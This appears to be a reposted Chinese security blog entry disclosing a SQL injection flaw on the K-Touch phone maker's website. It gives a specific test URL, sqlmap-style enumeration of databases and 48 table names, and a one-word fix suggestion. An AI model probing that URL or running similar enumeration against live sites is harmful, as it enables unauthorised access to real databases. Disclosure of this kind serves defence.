天宇手机官网伪静态SQL注入漏洞 – 网站安全 – 自

时间: 2020-10-10|tag: 30次围观|0 条评论

天宇手机官网伪静态SQL注入漏洞

测试URL http://www.k-touch.cn/product/condetail/prod_id/123.html

 

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [5]:
[*] donglonghai
[*] information_schema
[*] mysql
[*] qiangguo
[*] renshe

current database:    'renshe'


Database: renshe
[48 tables]
+-------------------+
| yan_access        |
| yan_ad            |
| yan_admin         |
| yan_announce      |
| yan_answer        |
| yan_baoming       |
| yan_bjcx          |
| yan_bs            |
| yan_bscategory    |
| yan_bszn          |
| yan_bszncategory  |
| yan_case          |
| yan_casecategory  |
| yan_category      |
| yan_city          |
| yan_cx            |
| yan_cxcategory    |
| yan_downcategory  |
| yan_download      |
| yan_gk            |
| yan_gkcategory    |
| yan_goodscategory |
| yan_guanggao      |
| yan_hdjl          |
| yan_jgxx          |
| yan_jianli        |
| yan_link          |
| yan_member        |
| yan_msg           |
| yan_news          |
| yan_node          |
| yan_one           |
| yan_onecategory   |
| yan_page          |
| yan_province      |
| yan_role          |
| yan_role_user     |
| yan_sound         |
| yan_special       |
| yan_ticket        |
| yan_toupiao       |
| yan_type          |
| yan_user          |
| yan_xwzx          |
| yan_xwzxcategory  |
| yan_zcfg          |
| yan_zxtype        |
| yan_zxzx          |
+-------------------+

很多敏感表,昨天测试了,未脱裤。

修复方案:

过滤吧。
    上一篇: 那些年,那些 Apache Struts2 的漏洞 - 网站安全 - 自

    下一篇: Joomla插件构造函数后门分析 - 网站安全 - 自学p
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《天宇手机官网伪静态SQL注入漏洞 – 网站安全 – 自
   

还没有人抢沙发呢~